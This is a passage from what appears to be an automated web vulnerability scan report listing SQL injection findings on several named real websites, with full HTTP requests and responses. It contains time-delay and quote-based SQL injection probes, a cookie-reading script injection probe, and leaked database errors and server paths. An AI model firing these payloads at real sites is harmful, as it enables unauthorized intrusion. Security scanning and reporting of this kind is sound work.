Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:51:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1396
Content-Type: image/gif
Expires: Fri, 18 Mar 2011 18:51:36 GMT
Cache-control: private

...[SNIP]...

Request 2

GET /KERNEL/DOC.ASP?id={75BF6FFD-43C6-474B-A2A0-A68D0CD33C09}'%20and%201%3d2--%20&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:51:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Fri, 18 Mar 2011 18:51:37 GMT
Cache-control: private


1.62. http://www.b2f-concept.com/KERNEL/DOC.asp [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/DOC.asp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the id parameter. The application took 61349 milliseconds to respond to the request, compared with 15108 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/DOC.asp?id={4A2C90A0-9D88-4CF4-A95B-49B0086E8D7C}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 17:50:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: image/pjpeg
Expires: Fri, 18 Mar 2011 19:50:13 GMT
Cache-control: private


1.63. http://www.b2f-concept.com/KERNEL/index.asp [NODE_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/index.asp

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the NODE_ID parameter. The application took 42058 milliseconds to respond to the request, compared with 3994 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/index.asp?NODE_ID={9E70064A-44D6-48DE-86A9-FDCD2BE067F6}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:01:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:21:15 GMT
Cache-control: private


1.64. http://www.b2f-concept.com/KERNEL/index.asp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/index.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/index.asp?NODE_REF=EDITION&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q="
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:07:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:06:41 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A07%3A41; expires=Sat, 25-Jun-2011 16:07:40 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=NBAGAOMBOGDMKKNIPLGJCLJB; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de générer le contexte SSPI
</body>
...[SNIP]...

1.65. http://www.baysideeyes.com.au/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 196
Content-Type: text/html; charset=utf-8

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 5388
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.66. http://www.baysideeyes.com.au/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /favicon.ico' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 209
Content-Type: text/html; charset=utf-8

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico'' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 5388
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.67. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 196
Content-Type: text/html; charset=utf-8

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 5388
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.68. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=AODCJGCBNPEOPJNIOMMCBHKP; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:15 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11958
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=CODCJGCBICICAENHLIHFJGFH; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:15 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

1.69. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx'/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=NCECJGCBHAHIIHMEHHCCKPPD; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:27 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx''/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11978
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=BDECJGCBOEGMOGLPOPIFEBPE; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:27 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO''/X22</title>
<meta name="descr
...[SNIP]...

1.70. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22'?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=MFECJGCBFKHMLKDBGLAOLFJG; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:32 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22''?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11978
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=OFECJGCBJKDAIPPHINOLACEC; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:33 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''</title>
<meta name="descr
...[SNIP]...

1.71. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /accommodation2.php?id=9026' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:46:59 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10042

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...

1.72. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /accommodation2.php?id=/1'9026 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:49:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10070

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'9026' at line 1<br /><br /><textarea rows="10" cols="10
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...

1.73. http://www.caribbean-ocean.com/countries2.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /countries2.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /countries2.php?id=308' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/accommodation2.php?id=9026
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:45:59 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6888

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.74. http://www.caribbean-ocean.com/countries2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /countries2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /countries2.php?id/1'=308 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/accommodation2.php?id=9026
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:47:43 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
